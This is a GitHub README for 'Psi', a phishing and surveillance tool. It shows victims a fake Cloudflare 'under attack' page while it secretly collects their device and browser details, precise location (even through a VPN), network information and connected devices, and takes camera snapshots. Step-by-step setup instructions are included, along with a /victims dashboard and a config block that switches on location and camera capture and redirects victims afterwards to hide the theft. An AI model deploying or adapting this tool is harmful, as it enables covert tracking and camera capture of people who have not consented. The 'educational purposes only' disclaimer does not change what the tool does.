Skip to content

Th30neAnd0nly/Psi

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

48 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Ψ

Information Gathering Through Link

Specifications

  • It shows a fake cloudflare under attack page and grabs the information.
  • Gets The Information About browser and Device of User.
  • Get the exact location coordinates.
  • Even if Victim Uses VPN and doesn't allow the location permission you are able to see which country he resides.
  • Network Information and all the audio and camera devices connected to the system.
  • Snaps the picture from camera.

How to use

Run on Repl.it

Run on your Local Machine

  • You need to have Node.js installed.
  1. Clone the repo using git clone https://github.com/Th30neAnd0nly/Psi
  2. cd Psi
  3. npm install
  4. npm start
  5. The app will be running at http://localhost:5000
  6. For seeing the victims data visit http://localhost:5000/victims

Configuration

  • The app.js file contains config variable.
var config={
location:true,
camera:true,
camsnaps:4,
redirectURL:"https://google.com"
}
location:true
//Can be true or false
  • Set it to true , if you want to grab victims location coordinates.
camera:true
//Can be true or false
  • Set it to true , If you want to capture images from victims camera.
camsnaps:2
  • Set the number of images you want to capture
redirectURL: "https://xxxxxxx.xxx"
  • The website where you want the user to be redirected after getting information.

Credits

❤️Supporters❤️

Stargazers repo roster for @th30neand0nly/Psi

Forkers repo roster for @th30neand0nly/Psi

DISCLAIMER

TO BE USED FOR EDUCATIONAL PURPOSES ONLY

The use of the PSI is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.